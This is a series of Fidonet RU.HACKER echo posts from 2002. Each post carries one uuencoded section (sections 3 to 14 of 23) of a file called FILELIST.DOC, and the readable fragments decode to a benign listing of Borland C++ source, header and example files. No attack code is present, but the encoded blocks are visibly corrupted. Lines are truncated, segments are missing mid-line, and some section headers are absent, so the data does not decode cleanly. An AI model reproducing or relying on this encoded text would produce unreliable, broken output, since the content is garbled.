M92!F:6QE(&9O0T*("`@ M1$]34T540DP@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1E],6$U53"`@($%332`M(%-O=7)C92!F M:6QE(&9O0T*("`@1D9, M55-(("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1DQ%3D=42"`@($-!4R`M(%-O=7)C92!F:6QE M(&9O0T*("`@1E-#04Y& M("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1T541$E32R`@("`@0R`M(%-O=7)C92!F:6QE(&9O M0T*("`@1T544U=)5"`@ M("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@2%]04T)0("`@($%332`M(%-O=7)C92!F:6QE(&9O0T*("`@2T)(250@("`@($-! M4R`M(%-O=7)C92!F:6QE(&9O0T*("`@345-0TU0("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@345-4T54("`@($-!4R`M M(%-O=7)C92!F:6QE(&9O0T*("`@34]6151%6%0@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@3U!%3D$@("`@($-!4R`M(%-O M=7)C92!F:6QE(&9O0T* M("`@4%545R`@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4D5.04U%("`@($-!4R`M(%-O=7)C M92!F:6QE(&9O0T*("`@ M4T-!3D8@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4T541$%412`@($-!4R`M(%-O=7)C92!F M:6QE(&9O0T*("`@4T]0 M14X@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U1)344@("`@("`@0R`M(%-O=7)C92!F:6QE M(&9O0T*("`@4U120U-0 M3B`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U123%=2("`@($-!4R`M(%-O=7)C92!F:6QE(&9O M0T*("`@4U124$)22R`@ M("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U1255!2("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@5$],3U=%4B`@("`@ M0R`M(%-O=7)C92!F:6QE(&9O0T*("`@54Y,24Y+("`@($-!4R`M(%-O=7)C92!F:6QE(&9O&%M<&QE(&9I;&4-"B`@($-- M1$Q'("`@("!$148@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I;&4-"B`@($-- M1$Q'("`@("`@($@@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I;&4-"B`@($-- M1$Q'("`@("!04DH@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I;&4-"B`@($-- M1$Q'("`@("`@4D,@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I;&4-"B`@($-- M1$Q'4B`@("`@($@@+2!7:6YD;W=S(#,N,2!E>&%M<&QE(&9I;&4-"@T*1DE, M14Q)4U0@($1/0R`M($9I;&4@3&ES=`T*24Y#3%5$12`@(%I)4"`M($)O7!E+"!?0TQ!4U-465!%#0H@ M("!?3D9)3$4@("`@("!(("T@0F]R;&%N9"!#*RL@4E1,($AE861E Статус [■■··················] < section 3 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M#0H@("!?3E5,3"`@("`@("!(("T@1&5F:6YI=&EO;B!O9B!.54Q,#0H@("!! M3$Q/0R`@("`@("!(("T@0F]R;&%N9"!#*RL@4E1,($AE861E&%M<&QE('!R;V=R86T-"B`@($%#3$]#2R`@("`@4D,@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($-50TM/3S(@("!"35`@ M+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($-5 M0TM/3S4@("!"35`@+2!&:6QE(&9O&%M<&QE('!R sum -r/size 22201/7440 section (from first to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3789 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [4/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■■■·················] < section 4 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M;V=R86T-"B`@($-50TM/3S@@("!"35`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"@T*0D=)("`@("`@(%I)4"`M($=R87!H:6-S M(&1R:79E0T*("`@04)35$%24ED@($-04"`M M($%B2!C;&%S M0T*("`@04Q,3T-!("`@($%332`M(%-O=7)C M92!F:6QE(&9O0T*("`@ M0T],3U(@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@0U)424Y)5"`@($-!4R`M(%-O=7)C92!F M:6QE(&9O0T*("`@1$]3 M0TU-250@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@15A%0R`@("`@($%332`M(%-O=7)C92!F:6QE M(&9O0T*("`@15A%0TQ0 M("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@15A%0U9012`@("`@0R`M(%-O=7)C92!F:6QE(&9O sum -r/size 33706/7440 section (from first to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3790 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [5/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■■■■················] < section 5 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M0T*("`@1DA%05!#2$L@ M($%332`M(%-O=7)C92!F:6QE(&9O0T*("`@1E-%14L@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1T540R`@("`@($-! M4R`M(%-O=7)C92!F:6QE(&9O0T*("`@2$%21$524B`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@24]#5$P@("`@($-!4R`M M(%-O=7)C92!F:6QE(&9O0T*("`@3$]#2TE.1R`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@3D5!4DA%05`@($%332`M(%-O M=7)C92!F:6QE(&9O0T* M("`@4%540R`@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4D5!1"`@("`@($-!4R`M(%-O=7)C M92!F:6QE(&9O0T*("`@ M4T-2145.("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4T540E5&("`@("`@0R`M(%-O=7)C92!F M:6QE(&9O0T*("`@4T54 M5D)51B`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U!!5TY,("`@("`@0R`M(%-O=7)C92!F:6QE M(&9O0T*("`@4U!!5TY, M4$4@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U!!5TY64"`@("`@0R`M(%-O=7)C92!F:6QE(&9O M0T*("`@4U1!5"`@("`@ M($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U125$]53"`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@5DY%5T8@("`@($-0 M4"`M(%-O=7)C92!F:6QE(&9O0T*("`@5E)!32`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*#0I'1$E$14U/("`@6DE0("T@ M1T1)1$5-3R!E>&%M<&QE('!R;V=R86T-"B`@($%25%D@("`@("!#4%`@+2!3 M;W5R8V4@9FEL92!F;W(@1V1I9&5M;R!E>&%M<&QE('!R;V=R86T-"B`@($%2 M5%D@("`@("`@($@@+2!(96%D97(@9FEL92!F;W(@1V1I9&5M;R!E>&%M<&QE M('!R;V=R86T-"B`@($%25%E04DE6("`@($@@+2!(96%D97(@9FEL92!F;W(@ M1V1I9&5M;R!E>&%M<&QE('!R;V=R86T-"B`@($)!0TM'4DY$("!"35`@+2!" M:71M87`@9F]R($=D:61E;6\@97AA;7!L92!P&%M<&QE('!R;V=R86T-"@T*34%4 M2%-20R`@(%I)4"`M(%)43"!S;W5R8V4@9FEL97,-"B`@(%]-051(15),("`@ M($,@+2!3;W5R8V4@9FEL92!F;W(@;6%T:"!L:6)R87)Y#0H@("!?34%42$52 M4B`@("!#("T@4V]U0T*("`@7U!/ M5S$P("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@051!3B`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@051!3DP@("`@($-!4R`M(%-O=7)C92!F M:6QE(&9O0T*("`@0T5)3"`@("`@($-! M4R`M(%-O=7)C92!F:6QE(&9O0T*("`@ M0T]3("`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@0T]33"`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@149#5E0@("`@("`@0R`M(%-O=7)C M92!F:6QE(&9O0T*("`@15A0("`@("`@ M($-!4R`M(%-O=7)C92!F:6QE(&9O Статус [■■■■■···············] < section 6 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M6%!,1"`@("`@0T%3("T@4V]U0T* M("`@1D%"4R`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@1DQ!1U,X-R`@($%332`M(%-O=7)C92!F:6QE(&9O M0T*("`@1DU/1"`@("`@($-!4R`M(%-O M=7)C92!F:6QE(&9O0T*("`@1E!215-% M5"`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1E1/3"`@("`@($%332`M(%-O=7)C92!F:6QE(&9O0T*("`@2%E03U0@("`@($-!4R`M(%-O=7)C92!F:6QE M(&9O0T*("`@3$1%6%!,("`@($-!4R`M M(%-O=7)C92!F:6QE(&9O0T*("`@3$]' M,3`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@34%42"`@("`@($U!2R`M($UA:V4@9FEL92!F;W(@;6%T:"!L M:6)R87)Y#0H@("!-051(15)2("`@("!#("T@4V]U0T*("`@34%42$524DP@("`@0R`M(%-O=7)C92!F:6QE(&9O M0T*("`@34%42%=(62`@("`@0R`M(%-O=7)C92!F M:6QE(&9O0T*("`@4$],62`@("`@($-! M4R`M(%-O=7)C92!F:6QE(&9O0T*("`@ M4$]7,3!$("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4D5!3$-65"`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@4TE.("`@("`@($-!4R`M(%-O=7)C M92!F:6QE(&9O0T*("`@4TE.3"`@("`@ M($-!4R`M(%-O=7)C92!F:6QE(&9O0T* M("`@4U1!5#@W("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@5$%.2"`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O M0T*("`@5TE.5%)!3E,@($%332`M(%-O M=7)C92!F:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($],15-25E(@("!04DH@+2!&:6QE(&9O M&%M<&QE('!R;V=R86T-"B`@(%-%4E9%4B`@("!# M4%`@+2!&:6QE(&9O Статус [■■■■■■··············] < section 7 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M("`@4T-23TQ,0D$@($-04"`M($EM<&QE;65N=&%T:6]N(&]F(%138W)O;&Q" M87(@8VQA2!3=')E86UA8FQE#0H@("`@("`@("`@("`@("`@ M("`@;V)J96-TGIL M90T*("`@4%5:6DQ%("`@("`@2"`M($AE861EFQE M#0H@("!45D)'22`@("`@0U!0("T@0D=)(&%N9"!45B!D96UO#0H@("!45D)' M22`@("`@("!(("T@2&5A9&5R(&9O Статус [■■■■■■··············] < section 8 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M5'5R8F\@5FES:6]N($AE861E&%M<&QE('!R;V=R86T-"B`@($)+3D=4("`@("!"35`@ M+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($)0 M05=.("`@("!"35`@+2!&:6QE(&9O&%M<&QE('!R M;V=R86T-"B`@($-(15-3("`@("!)0T\@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($1)4U!,05D@("!#4%`@+2!&:6QE(&9O M&%M<&QE('!R;V=R86T-"B`@($5$250@("`@("`@ M($@@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@ M($E.1D\@("`@("!#4%`@+2!&:6QE(&9O&%M<&QE M('!R;V=R86T-"B`@($M434%32R`@("!"35`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($]014Y)3D<@("!,24(@+2!&:6QE M(&9O&%M<&QE('!R;V=R86T-"B`@(%!604Q512`@ M("`@($@@+2!&:6QE(&9O&%M<&QE('!R;V=R86T- M"B`@(%-!5D5215-4("!#4%`@+2!&:6QE(&9O&%M M<&QE('!R;V=R86T-"B`@(%1!3$L@("`@("!#4%`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@(%=#1$5&4R`@("`@($@@+2!& M:6QE(&9O&%M<&QE('!R;V=R86T-"B`@(%=#2$53 M4R`@("`@($@@+2!&:6QE(&9O&%M<&QE('!R;V=R M86T-"B`@(%=+24Y'("`@("!"35`@+2!&:6QE(&9O&%M<&QE('!R;V=R86T-"B`@(%=1545%3B`@("!"35`@+2!&:6QE(&9O"!C=7-T;VT@8V]N=')O;"X-"B`@ M($)2041)3R`@("`@($@@+2!(96%D97(@9FEL92!F;W(@5$)2861I;T)U='1O M;B!C=7-T;VT@8G5T=&]N+@T*("`@0E-4051"35`@("`@2"`M($AE861E5!O;VP@8VQA Статус [■■■■■■■·············] < section 9 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M&%M<&QE('!R M;V=R86T-"B`@($))3U,@("`@("!)3D,@+2!487-M(&5X86UP;&4@9FEL90T* M("`@0DE/4TU!0R`@($1/0R`M(%1A&%M<&QE(&9I;&4-"B`@($1/4R`@("`@("!) M3D,@+2!487-M(&5X86UP;&4@9FEL90T*("`@1$]334%#("`@($1/0R`M(%1A M&%M M<&QE(&9I;&4-"B`@($E"24]3("`@("!-04,@+2!487-M(&5X86UP;&4@9FEL M90T*("`@24)95$5#4%D@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($E$3U,@("`@ M("!)3D,@+2!487-M(&5X86UP;&4@9FEL90T*("`@241/4R`@("`@($U!0R`M M(%1A&%M<&QE(&9I;&4-"B`@($E&24Y$0EE4("!!4TT@+2!487-M(&5X86UP;&4@ M9FEL90T*("`@249)3D1&24P@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($E,3T-3 M5%)'("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@24U!0U)/4R`@($U! M0R`M(%1A&%M<&QE(&9I;&4-"B`@($E005)3149.("!!4TT@+2!487-M(&5X86UP M;&4@9FEL90T*("`@25-+4%=(250@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($E7 M2$=,3T),("!)3D,@+2!487-M(&5X86UP;&4@9FEL90T*("`@25=2251%4%,@ M($%332`M(%1A&%M<&QE(&9I;&4-"B`@(%=(15)%25,@("!$3T,@+2!487-M(&5X M86UP;&4@9FEL90T*("`@5TA%4D5)4R`@($U!2R`M(%1A&%M<&QE(&9I;&4-"@T* M5TE.3$E"("`@($-!,2`M(%=I;F1O=R!L:6)R87)I97,-"B`@($,P1$,@("`@ M("!/0DH@+2!#;VUP86-T(&UO9&5L('-T87)T=7`@8V]D92`M(%=I;F1O=W,@ M1$Q,#0H@("!#,$1,("`@("`@3T)*("T@3&%R9V4@;6]D96P@2`M(%=I;F1O=W,-"B`@($U!5$A7 M0R`@("!,24(@+2!#;VUP86-T(&UO9&5L('=I;F1O=W,@;6%T:"!L:6)R87)Y M#0H@("!-051(5TP@("`@3$E"("T@3&%R9V4@;6]D96P@=VEN9&]W0T*#0H-"D1)4TL@-0T*+2TM+2TM M#0I"24Y$3$P@("`@6DE0("T@0F]R;&%N9"!#*RL@1$Q,('!A8VMA9V4-"B`@ sum -r/size 1277/7440 section (from first to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3795 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [10/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■■■■■■■■············] < section 10 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M($)#,S!25$P@("!$3$P@+2!";W)L86YD(')U;BUT:6UE(&QI8G)A2!F:6QE M(&9O2!F:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($), M04-+34%.("!"35`@+2!":71M87`@9F]R($-H96-K97)S(&5X86UP;&4@<')O M9W)A;0T*("`@0D]!4D0@("`@($-04"`M(%-O=7)C92!F:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($)/05)$("`@("`@($@@+2!(96%D M97(@9FEL92!F;W(@0VAE8VME&%M<&QE('!R;V=R86T-"B`@($-(14-+15)3("!)0T\@+2!) M8V]N(&9O&%M<&QE('!R;V=R86T-"B`@($-(14-+15)3 M("!04DH@+2!0&%M<&QE('!R;V=R86T- M"B`@($E.1D\@("`@("!#4%`@+2!3;W5R8V4@9FEL92!F;W(@0VAE8VME&%M<&QE('!R;V=R86T- M"B`@(%)%1$M)3D<@("!"35`@+2!":71M87`@9F]R($-H96-K97)S(&5X86UP M;&4@<')O9W)A;0T*("`@4D5$34%.("`@($)-4"`M($)I=&UA<"!F;W(@0VAE M8VME0T*#0I#3$%34TQ)0B`@6DE0("T@0RLK(&-L87-S(&QI8G)A2!F:6QE(&9O2!F:6QE(&9O2!F:6QE M(&9O0T*("`@0DE/4U]+15D@($-!4R`M(%-O M=7)C92!F:6QE(&9O0T* M("`@0E)+("`@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@0T=%5%,@("`@("`@0R`M(%-O=7)C M92!F:6QE(&9O0T*("`@ M0TQ/0TL@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@0U)%050@("`@($-!4R`M(%-O=7)C92!F M:6QE(&9O0T*("`@0U94 M1D%+("`@($%332`M(%-O=7)C92!F:6QE(&9O0T*("`@1$]30TU$("`@("`@0R`M(%-O=7)C92!F:6QE M(&9O0T*("`@1$]31D%4 M5%(@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@1$]33U!%3B`@($-!4R`M(%-O=7)C92!F:6QE(&9O M0T*("`@1$]35D5#5"`@ M($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@1D)22R`@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1DY34$Q)5"`@("`@ M0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1E=2251%("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@1T541$%412`@("`@0R`M M(%-O=7)C92!F:6QE(&9O0T*("`@1T541D%4("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@1T545D5#5"`@($-!4R`M(%-O M=7)C92!F:6QE(&9O0T* M("`@2%]0041!("`@($%332`M(%-O=7)C92!F:6QE(&9O0T*("`@24Y44B`@("`@($-!4R`M(%-O=7)C M92!F:6QE(&9O0T*("`@ M3%-%14L@("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@345-0T-062`@($-!4R`M(%-O=7)C92!F M:6QE(&9O0T*("`@34]6 M345-("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@4$524D]2("`@("`@0R`M(%-O=7)C92!F:6QE M(&9O0T*("`@4D5!1$$@ sum -r/size 21791/7440 section (from first to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3796 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [11/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■■■■■■■■■···········] < section 11 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M("`@($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U-#04Y&("`@("`@0R`M(%-O=7)C92!F:6QE(&9O M0T*("`@4U120TA2("`@ M($-!4R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U1215)23U(@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U123D-062`@($-! M4R`M(%-O=7)C92!F:6QE(&9O0T*("`@4U125$]+("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@5$585$U/1$4@("`@0R`M M(%-O=7)C92!F:6QE(&9O0T*("`@551)344@("`@("`@0R`M(%-O=7)C92!F:6QE(&9O0T*("`@5D1%3"`@("`@($-04"`M(%-O M=7)C92!F:6QE(&9O0T* M("`@5DY%5U8@("`@($-04"`M(%-O=7)C92!F:6QE(&9O0T*("`@5U))5$5!("`@($-!4R`M(%-O=7)C M92!F:6QE(&9O&%M<&QE("T@86YO M=&AE&%M<&QE(&9I;&4-"B`@($U91E5.0U,@("`@($@@+2!#(&5X M86UP;&4@2&5A9&5R(&9I;&4-"B`@($U934%)3B`@("!#4%`@+2!#(&5X86UP M;&4@9FEL90T*("`@4D,R35-'("`@("`@0R`M($5X86UP;&4@<')O9W)A;2!F M;W(@0F]R;&%N9"!#*RL@9FEL=&5R&%M<&QE('!R;V=R86T-"B`@(%9#25)#("`@ M("!04DH@+2!0&%M<&QE('!R;V=R86T-"B`@(%903TE.5"`@("`@ M($@@+2!(96%D97(@9FEL92!F;W(@5E!/24Y4+D-04`T*#0I25T-$14U/("`@ M6DE0("T@0V]M<')E Статус [■■■■■■■■■■··········] < section 12 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M;R!"=6EL9"!386UP;&4@5$1/1$5-3RY#4%`@4')O9W)A;0T*("`@5$1/1$5- M3R`@("!20R`M(%)E&5C=71A8FQE(&9I;&4@1F]R($,@4')O9W)A;2!T M;R!R=6X@:6X@5$17#0H@("!41$]$14U/0B`@("!(("T@2&5A9&5R(&9I;&4@ M=7-E9"!T;R!"=6EL9"!386UP;&4@5$1/1$5-3T(@4')O9W)A;7,-"B`@(%1$ M3T1%34]"("!04DH@+2!-86ME9FEL92!T;R!"=6EL9"!386UP;&4@5$1/1$5- M3T(N0U!0(%!R;V=R86T-"@T*5TA%3%`R("`@($-!-B`M(%-P;&ET($9I;&4@ M;V8@5TA%3%`R+EI)4`T*#0I$25-+(#8-"BTM+2TM+0T*0T%,0R`@("`@(%I) M4"`M($-A;&-U;&%T;W(@97AA;7!L92!P"!C86QC=6QA=&]R(&5X86UP;&4@<')O9W)A;0T* M("`@34%+149)3$4@("`@("`M($UA:V5F:6QE(&9O6)O87)D#0H@("`@("`@("`@("`@("`@("`@0T*("`@551)3%,@("`@("!41"`M($EN M9F\@86)O=70@=F%R:6]U0T*("`@34%42$@@ M("`@($Q)0B`M($AU9V4@;6]D96P@;6%T:"!L:6)R87)Y#0H-"E1!4TU%6$U0 M("!:25`@+2!Z:7`@9FEL90T*("`@05--4%-#3"`@($%332`M(%1A&%M<&QE(&9I M;&4-"B`@($))3U,@("`@("!)3D,@+2!487-M(&5X86UP;&4@9FEL90T*("`@ M0T%,0T%61R`@($-04"`M(%1A&%M<&QE(&9I;&4-"B`@($-!3$Q04D]#("!!4TT@ M+2!487-M(&5X86UP;&4@9FEL90T*("`@0T%334Q)3DL@($%332`M(%1A&%M<&QE M(&9I;&4-"B`@($-/3D-)4T4@("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T* M("`@0T]53E0@("`@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($-/54Y4041$("!# M4%`@+2!487-M(&5X86UP;&4@9FEL90T*("`@0T]53E1,1R`@($%332`M(%1A M&%M M<&QE(&9I;&4-"B`@($1"3$-/3$].("!!4TT@+2!487-M(&5X86UP;&4@9FEL M90T*("`@1$Q,4%)/1R`@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($1/5$]404P@ M("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@14Y634]$("`@($%332`M M(%1A&%M<&QE(&9I;&4-"B`@($580TA-3T0@("!!4TT@+2!487-M(&5X86UP;&4@ M9FEL90T*("`@15A%4%)/1R`@($%332`M(%1A&%M<&QE(&9I;&4-"B`@($A%3$Q/ M,2`@("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@2$5,3$\R("`@($%3 M32`M(%1A&%M<&QE(&9I;&4-"B`@($A%6"`@("`@("!!4TT@+2!487-M(&5X86UP M;&4@9FEL90T*("`@2$58("`@("`@(%!!4R`M(%1A&%M<&QE(&9I;&4-"B`@($M" M1"`@("`@("!)3D,@+2!487-M(&5X86UP;&4@9FEL90T*("`@3$E.2S)!4TT@ M($-04"`M(%1A&%M<&QE(&9I;&4-"B`@($U$3U,@("`@("!-04,@+2!487-M(&5X M86UP;&4@9FEL90T*("`@34U!0U)/4R`@($U!0R`M(%1A&%M<&QE(&9I;&4-"B`@ M(%!235-404-+("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*("`@4D5615)3 M12`@($%332`M(%1A&%M<&QE(&9I;&4-"B`@(%-/34535%(@("!!4TT@+2!487-M M(&5X86UP;&4@9FEL90T*("`@5D%215A#2"`@($%332`M(%1A&%M<&QE(&9I;&4- M"B`@(%=)3E!23T<@("!!4TT@+2!487-M(&5X86UP;&4@9FEL90T*#0I715A! M35!,12`@6DE0("T@5VEN9&]W&%M<&QE(&9I;&5S#0H@("!"251-05`@ M("`@0U!0("T@5VEN9&]W Статус [■■■■■■■■■■■·········] < section 13 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M("`@("!"35`@+2!(96QP(&-O;7!I;&5R(&5X86UP;&4@8FET;6%P(&9I;&4- M"B`@($9&24Y$("`@("`@($,@+2!7:6YD;W=S('-A;7!L92!A<'`@+2!3;W5R M8V4-"B`@($9&24Y$("`@("!$148@+2!7:6YD;W=S('-A;7!L92!A<'`@+2!- M;V1U;&4@9&5F:6YI=&EO;B!F:6QE#0H@("!&1DE.1"`@("`@("!(("T@5VEN M9&]W&%M<&QE('-O=7)C92!F:6QE#0H@("!(14Q015@@("`@ M1$5&("T@2&5L<"!C;VUP:6QE&%M<&QE(&UO9'5L92!D969I;FET:6]N M(&9I;&4-"B`@($A%3%!%6"`@("!$3$<@+2!(96QP(&-O;7!I;&5R(&5X86UP M;&4@9&EA;&]G(&9I;&4-"B`@($A%3%!%6"`@("`@($@@+2!(96QP(&-O;7!I M;&5R(&5X86UP;&4@2&5A9&5R(&9I;&4-"B`@($A%3%!%6"`@("!(4$H@+2!( M96QP(&-O;7!I;&5R(&5X86UP;&4@9FEL90T*("`@2$5,4$58("`@(%!22B`M M(%!R;VIE8W0@9FEL92!F;W(@:&5L<"!C;VUP:6QE&%M<&QE&%M M<&QE(&9I;&4-"B`@($A%3%!)0T].("!"35`@+2!(96QP(&-O;7!I;&5R(&5X M86UP;&4@8FET;6%P(&9I;&4-"B`@($A%3%!)1%,@("`@($@@+2!(96QP(&-O M;7!I;&5R(&5X86UP;&4@2&5A9&5R(&9I;&4-"B`@($M%65,@("`@("!25$8@ M+2!(96QP(&-O;7!I;&5R(&5X86UP;&4@9FEL90T*("`@35-'4%)/0R`@("`@ M0R`M(%=I;F1O=W,@2!C;&%S&%M<&QE(&9I;&4-"B`@($1)4D5#5%)9("`@($@@+2!( M96%D97(@9FEL92!F;W(@1$E214-44EDN0U!0#0H@("!$25)%0U1262`@4%)* M("T@4')O:F5C="!F:6QE(&9O&%M<&QE(&9I;&4-"B`@($9)3$5$ M051!("`@($@@+2!(96%D97(@(&9I;&4@9F]R($9)3$5$051!+D-04`T*("`@ M3$]/2U50("`@($-04"`M($QO;VMU<"!T86)L92!E>&%M<&QE#0H@("!,3T]+ M55`@("`@4%)*("T@4')O:F5C="!F:6QE(&9O&%M<&QE M(&9I;&4-"B`@(%-44DY'34%8("!04DH@+2!02!E>&%M M<&QE(&9I;&4-"@T*0TQ)0B`@("`@(%I)4"`M($-O;7!A8W0@;6]D96P@;&EB M0T*#0I#3$E/3$4@("`@6DE0("T@#0H@("!#3$E/ M3$4@("`@("!#("T@5VEN9&]W&%M<&QE('!R;V=R86T-"B`@($1$14-,22`@("`@4D,@+2!& M:6QE(&9O&%M<&QE('!R;V=R86T-"B`@($1$15-6 M4B`@("`@($@@+2!&:6QE(&9O&%M<&QE('!R;V=R M86T-"@T*1$1%34PS,2`@(%I)4"`M(`T*("`@1$1%0TQ.5"`@("`@0R`M(%=I sum -r/size 23344/7440 section (from first to last encoded line) --- UU Wizard v1.64.63 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5061/120) = Здесь обитают хакеры ====================================================New= Msg : 3799 [1-10330] From : All 25-Aug-02 16:05:00 2:5061/120 To : All Subj : [14/23] FILELIST.DOC =====================================================================RU.HACKER= > Статус [■■■■■■■■■■■■········] < section 14 of 23 of file filelist.doc < uuencoded by UU Wizard v1.64.63 > M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%0TQ.5"`@($1%1B`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%0TQ.5"`@($1/0R`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%0TQ.5"`@("`@2"`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%0TQ.5"`@($E#3R`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%0TQ.5"`@(%!22B`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%0TQ.5"`@("!20R`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%4U)64B`@("`@0R`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%4U)64B`@($1%1B`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%4U)64B`@("`@2"`M(%=I M;F1O=W,@,RXQ(&5X86UP;&4@9FEL90T*("`@1$1%4U)64B`@($E#3R`M(%=I 